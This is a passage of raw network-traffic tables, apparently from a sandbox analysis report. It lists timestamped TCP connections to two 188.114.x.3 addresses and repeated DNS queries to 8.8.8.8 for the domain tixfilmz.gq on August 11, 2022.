                  Aug 11, 2022 06:43:53.308239937 CEST4988380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:43:53.325719118 CEST8049883188.114.97.3192.168.2.3
                  Aug 11, 2022 06:43:53.325928926 CEST4988380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:43:53.342715025 CEST8049883188.114.97.3192.168.2.3
                  Aug 11, 2022 06:43:53.422276974 CEST8049883188.114.97.3192.168.2.3
                  Aug 11, 2022 06:43:53.422316074 CEST8049883188.114.97.3192.168.2.3
                  Aug 11, 2022 06:43:53.422451019 CEST4988380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:43:53.422569990 CEST4988380192.168.2.3188.114.97.3
                  Aug 11, 2022 06:43:53.441950083 CEST8049883188.114.97.3192.168.2.3
                  Aug 11, 2022 06:43:54.310568094 CEST4988480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:54.327620983 CEST8049884188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:54.327752113 CEST4988480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:54.330408096 CEST4988480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:54.347140074 CEST8049884188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:54.347251892 CEST4988480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:54.364037037 CEST8049884188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:54.443857908 CEST8049884188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:54.444036007 CEST8049884188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:54.444139957 CEST4988480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:54.444660902 CEST4988480192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:54.461000919 CEST8049884188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:55.355025053 CEST4988580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:55.371938944 CEST8049885188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:55.373763084 CEST4988580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:55.376396894 CEST4988580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:55.393197060 CEST8049885188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:55.394433975 CEST4988580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:55.411267996 CEST8049885188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:55.477446079 CEST8049885188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:55.477741003 CEST4988580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:55.494657040 CEST8049885188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:55.701412916 CEST8049885188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:55.701716900 CEST4988580192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:58.311187029 CEST4988780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:58.328255892 CEST8049887188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:58.328859091 CEST4988780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:58.405291080 CEST4988780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:58.422405958 CEST8049887188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:58.422477961 CEST4988780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:58.439588070 CEST8049887188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:58.521328926 CEST8049887188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:58.521368980 CEST8049887188.114.96.3192.168.2.3
                  Aug 11, 2022 06:43:58.521471977 CEST4988780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:58.524753094 CEST4988780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:43:58.541793108 CEST8049887188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:00.111968994 CEST4988880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:00.129822969 CEST8049888188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:00.130165100 CEST4988880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:00.133245945 CEST4988880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:00.150147915 CEST8049888188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:00.150311947 CEST4988880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:00.167206049 CEST8049888188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:00.224335909 CEST8049888188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:00.224378109 CEST8049888188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:00.224474907 CEST4988880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:00.224551916 CEST4988880192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:00.241606951 CEST8049888188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:01.738924026 CEST4988980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:01.756063938 CEST8049889188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:01.756354094 CEST4988980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:01.764744997 CEST4988980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:01.781652927 CEST8049889188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:01.781905890 CEST4988980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:01.798881054 CEST8049889188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:01.874361038 CEST8049889188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:01.874432087 CEST8049889188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:01.874636889 CEST4988980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:01.874681950 CEST4988980192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:01.891566992 CEST8049889188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:03.437485933 CEST4989080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:03.454427958 CEST8049890188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:03.454562902 CEST4989080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:03.457386971 CEST4989080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:03.474327087 CEST8049890188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:03.474813938 CEST4989080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:03.491703987 CEST8049890188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:03.564661026 CEST8049890188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:03.564749956 CEST8049890188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:03.564944983 CEST4989080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:03.565779924 CEST4989080192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:03.582649946 CEST8049890188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:04.896159887 CEST4989280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:04.913132906 CEST8049892188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:04.913218975 CEST4989280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:04.916627884 CEST4989280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:04.933406115 CEST8049892188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:04.933479071 CEST4989280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:04.950350046 CEST8049892188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:05.023818016 CEST8049892188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:05.023859978 CEST8049892188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:05.024019003 CEST4989280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:05.024565935 CEST4989280192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:05.040952921 CEST8049892188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:06.136435986 CEST4989580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:06.153575897 CEST8049895188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:06.153800964 CEST4989580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:06.157277107 CEST4989580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:06.174215078 CEST8049895188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:06.174385071 CEST4989580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:06.191430092 CEST8049895188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:06.249001026 CEST8049895188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:06.249046087 CEST8049895188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:06.249176025 CEST4989580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:06.249213934 CEST4989580192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:06.266207933 CEST8049895188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:07.764620066 CEST4989680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:07.781574965 CEST8049896188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:07.781837940 CEST4989680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:07.789189100 CEST4989680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:07.806022882 CEST8049896188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:07.806155920 CEST4989680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:07.823090076 CEST8049896188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:07.921392918 CEST8049896188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:07.921555042 CEST8049896188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:07.921561003 CEST4989680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:07.921627998 CEST4989680192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:07.938440084 CEST8049896188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:08.807578087 CEST4989780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:08.824702978 CEST8049897188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:08.824954033 CEST4989780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:08.828123093 CEST4989780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:08.845180035 CEST8049897188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:08.845298052 CEST4989780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:08.862283945 CEST8049897188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:08.957175970 CEST8049897188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:08.957284927 CEST8049897188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:08.957410097 CEST4989780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:08.957448006 CEST4989780192.168.2.3188.114.96.3
                  Aug 11, 2022 06:44:08.974426985 CEST8049897188.114.96.3192.168.2.3
                  Aug 11, 2022 06:44:09.883063078 CEST4989880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:09.900207043 CEST8049898188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:09.900368929 CEST4989880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:09.907279015 CEST4989880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:09.924297094 CEST8049898188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:09.924417973 CEST4989880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:09.941373110 CEST8049898188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:10.024667978 CEST8049898188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:10.024714947 CEST8049898188.114.97.3192.168.2.3
                  Aug 11, 2022 06:44:10.024833918 CEST4989880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:10.024887085 CEST4989880192.168.2.3188.114.97.3
                  Aug 11, 2022 06:44:10.041824102 CEST8049898188.114.97.3192.168.2.3
                  TimestampSource PortDest PortSource IPDest IP
                  Aug 11, 2022 06:42:12.579299927 CEST5641753192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:12.602015018 CEST53564178.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:13.992285013 CEST5592353192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:14.014944077 CEST53559238.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:15.008493900 CEST5772353192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:15.031099081 CEST53577238.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:16.117017984 CEST5811653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:16.137682915 CEST53581168.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:17.405890942 CEST5742153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:17.425028086 CEST53574218.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:18.496882915 CEST6535853192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:18.516221046 CEST53653588.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:19.546256065 CEST4987353192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:19.568968058 CEST53498738.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:20.700263977 CEST5380253192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:20.720654964 CEST53538028.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:21.791645050 CEST6526653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:21.811207056 CEST53652668.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:22.919214964 CEST6333253192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:22.941586018 CEST53633328.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:23.995779991 CEST6354853192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:24.015325069 CEST53635488.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:25.168421984 CEST4932753192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:25.185749054 CEST53493278.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:26.266694069 CEST5139153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:26.285726070 CEST53513918.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:27.336091995 CEST5898153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:27.355494976 CEST53589818.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:28.398569107 CEST6445253192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:28.415982008 CEST53644528.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:29.567910910 CEST6138053192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:29.587415934 CEST53613808.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:30.599355936 CEST6314653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:30.618824005 CEST53631468.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:31.643933058 CEST5298553192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:31.661487103 CEST53529858.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:32.866031885 CEST5862553192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:32.883007050 CEST53586258.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:33.939414978 CEST5281053192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:33.958312035 CEST53528108.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:35.888000011 CEST5077853192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:35.905409098 CEST53507788.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:39.275734901 CEST5515153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:39.295176029 CEST53551518.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:41.147021055 CEST5979553192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:41.166609049 CEST53597958.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:42.621895075 CEST6481653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:42.748029947 CEST53648168.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:44.058989048 CEST5381653192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:44.078478098 CEST53538168.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:45.236285925 CEST6064053192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:45.256028891 CEST53606408.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:46.902745962 CEST4984453192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:46.922283888 CEST53498448.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:49.092282057 CEST6386153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:49.111659050 CEST53638618.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:50.516971111 CEST5151853192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:50.536231041 CEST53515188.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:51.834033012 CEST5258153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:51.851875067 CEST53525818.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:53.157044888 CEST5015253192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:53.176513910 CEST53501528.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:54.271861076 CEST5045053192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:54.291218042 CEST53504508.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:55.372447968 CEST5242753192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:55.389997959 CEST53524278.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:56.596381903 CEST6272453192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:56.616301060 CEST53627248.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:58.058382034 CEST6494153192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:58.078123093 CEST53649418.8.8.8192.168.2.3
                  Aug 11, 2022 06:42:59.355876923 CEST5540353192.168.2.38.8.8.8
                  Aug 11, 2022 06:42:59.373456955 CEST53554038.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:00.603039026 CEST5496053192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:00.622443914 CEST53549608.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:01.898330927 CEST6187753192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:01.917530060 CEST53618778.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:02.955979109 CEST6462453192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:02.975430965 CEST53646248.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:04.122617960 CEST6441253192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:04.141944885 CEST53644128.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:05.296510935 CEST5177953192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:05.314194918 CEST53517798.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:06.496205091 CEST5060853192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:06.515471935 CEST53506088.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:07.973258018 CEST5420553192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:07.990590096 CEST53542058.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:09.210062981 CEST5849753192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:09.229652882 CEST53584978.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:10.585853100 CEST6270153192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:10.605609894 CEST53627018.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:11.857250929 CEST5856153192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:11.876543999 CEST53585618.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:13.118525028 CEST6155553192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:13.137489080 CEST53615558.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:14.460020065 CEST6443353192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:14.482197046 CEST53644338.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:16.765618086 CEST5409653192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:16.782715082 CEST53540968.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:19.702389002 CEST6332653192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:19.721796036 CEST53633268.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:24.353002071 CEST5155753192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:24.372870922 CEST53515578.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:28.465460062 CEST5248753192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:28.482649088 CEST53524878.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:31.883057117 CEST5895053192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:31.902369022 CEST53589508.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:33.838053942 CEST5568653192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:33.857176065 CEST53556868.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:38.314882994 CEST6493453192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:38.334461927 CEST53649348.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:40.517680883 CEST5579553192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:40.536607981 CEST53557958.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:42.718416929 CEST6463553192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:42.738006115 CEST53646358.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:45.776087999 CEST5526953192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:45.793565989 CEST53552698.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:47.294298887 CEST6308353192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:47.313312054 CEST53630838.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:48.364883900 CEST5472653192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:48.382242918 CEST53547268.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:49.974272013 CEST5839453192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:49.993833065 CEST53583948.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:51.595494986 CEST4977553192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:51.615442038 CEST53497758.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:53.263878107 CEST6019553192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:53.284096956 CEST53601958.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:54.290009975 CEST5519753192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:54.309494972 CEST53551978.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:55.334676981 CEST5225253192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:55.353864908 CEST53522528.8.8.8192.168.2.3
                  Aug 11, 2022 06:43:58.292326927 CEST6069753192.168.2.38.8.8.8
                  Aug 11, 2022 06:43:58.309959888 CEST53606978.8.8.8192.168.2.3
                  Aug 11, 2022 06:44:00.089895010 CEST5196653192.168.2.38.8.8.8
                  Aug 11, 2022 06:44:00.108901978 CEST53519668.8.8.8192.168.2.3
                  Aug 11, 2022 06:44:01.716732025 CEST5430653192.168.2.38.8.8.8
                  Aug 11, 2022 06:44:01.736135960 CEST53543068.8.8.8192.168.2.3
                  Aug 11, 2022 06:44:03.415052891 CEST5006253192.168.2.38.8.8.8
                  Aug 11, 2022 06:44:03.434765100 CEST53500628.8.8.8192.168.2.3
                  Aug 11, 2022 06:44:04.875478029 CEST5086953192.168.2.38.8.8.8
                  Aug 11, 2022 06:44:04.894697905 CEST53508698.8.8.8192.168.2.3
                  Aug 11, 2022 06:44:06.112749100 CEST6148153192.168.2.38.8.8.8
                  Aug 11, 2022 06:44:06.132136106 CEST53614818.8.8.8192.168.2.3
                  Aug 11, 2022 06:44:07.745066881 CEST5038653192.168.2.38.8.8.8
                  Aug 11, 2022 06:44:07.762610912 CEST53503868.8.8.8192.168.2.3
                  Aug 11, 2022 06:44:08.781137943 CEST5285753192.168.2.38.8.8.8
                  Aug 11, 2022 06:44:08.800934076 CEST53528578.8.8.8192.168.2.3
                  Aug 11, 2022 06:44:09.862853050 CEST5298353192.168.2.38.8.8.8
                  Aug 11, 2022 06:44:09.882337093 CEST53529838.8.8.8192.168.2.3
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Aug 11, 2022 06:42:12.579299927 CEST192.168.2.38.8.8.80x5c29Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:13.992285013 CEST192.168.2.38.8.8.80xbd3dStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:15.008493900 CEST192.168.2.38.8.8.80x9c66Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:16.117017984 CEST192.168.2.38.8.8.80xb56cStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:17.405890942 CEST192.168.2.38.8.8.80x673cStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:18.496882915 CEST192.168.2.38.8.8.80xe48eStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:19.546256065 CEST192.168.2.38.8.8.80x48edStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:20.700263977 CEST192.168.2.38.8.8.80x281bStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:21.791645050 CEST192.168.2.38.8.8.80x5b0eStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:22.919214964 CEST192.168.2.38.8.8.80x8ef0Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:23.995779991 CEST192.168.2.38.8.8.80xe554Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:25.168421984 CEST192.168.2.38.8.8.80x3ae7Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:26.266694069 CEST192.168.2.38.8.8.80xc3c2Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:27.336091995 CEST192.168.2.38.8.8.80x1824Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:28.398569107 CEST192.168.2.38.8.8.80xff45Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:29.567910910 CEST192.168.2.38.8.8.80x376aStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:30.599355936 CEST192.168.2.38.8.8.80xba56Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:31.643933058 CEST192.168.2.38.8.8.80x4baeStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:32.866031885 CEST192.168.2.38.8.8.80x9d08Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:33.939414978 CEST192.168.2.38.8.8.80x84f1Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:35.888000011 CEST192.168.2.38.8.8.80x3daStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:39.275734901 CEST192.168.2.38.8.8.80xb3faStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:41.147021055 CEST192.168.2.38.8.8.80xbca9Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:42.621895075 CEST192.168.2.38.8.8.80x1213Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:44.058989048 CEST192.168.2.38.8.8.80x2ec5Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:45.236285925 CEST192.168.2.38.8.8.80x10fStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:46.902745962 CEST192.168.2.38.8.8.80x79bStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:49.092282057 CEST192.168.2.38.8.8.80x878fStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:50.516971111 CEST192.168.2.38.8.8.80xd021Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:51.834033012 CEST192.168.2.38.8.8.80x6bc7Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:53.157044888 CEST192.168.2.38.8.8.80x5202Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:54.271861076 CEST192.168.2.38.8.8.80x3c6fStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:55.372447968 CEST192.168.2.38.8.8.80x7cfaStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:56.596381903 CEST192.168.2.38.8.8.80xae31Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:58.058382034 CEST192.168.2.38.8.8.80x513fStandard query (0)tixfilmz.gqA (IP address)IN (0x0001)
                  Aug 11, 2022 06:42:59.355876923 CEST192.168.2.38.8.8.80x7f96Standard query (0)tixfilmz.gqA (IP address)IN (0x0001)
